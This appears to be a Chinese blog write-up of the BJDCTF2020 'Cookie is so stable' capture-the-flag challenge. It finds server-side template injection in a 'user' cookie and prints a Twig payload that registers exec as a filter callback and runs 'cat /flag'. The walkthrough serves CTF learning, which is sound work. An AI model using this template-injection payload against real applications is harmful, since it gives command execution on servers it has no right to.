您的位置: 首页  >  文章  >  [BJDCTF2020]Cookie is so stable

[BJDCTF2020]Cookie is so stable

分类: 文章 2025-05-16 18:35:22

题目
[BJDCTF2020]Cookie is so stable
过程
1.Flag和Hint两个页面抓包,flag页面告诉我们要先登录,hint页面告诉我们要在cookie里面做文章
[BJDCTF2020]Cookie is so stable
[BJDCTF2020]Cookie is so stable
2.flag页面先登录然后抓包,发现cookie里面出现user。尝试多次后,发现是ssti注入
[BJDCTF2020]Cookie is so stable
[BJDCTF2020]Cookie is so stable
3.打入payload。
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
[BJDCTF2020]Cookie is so stable
[BJDCTF2020]Cookie is so stable

相关推荐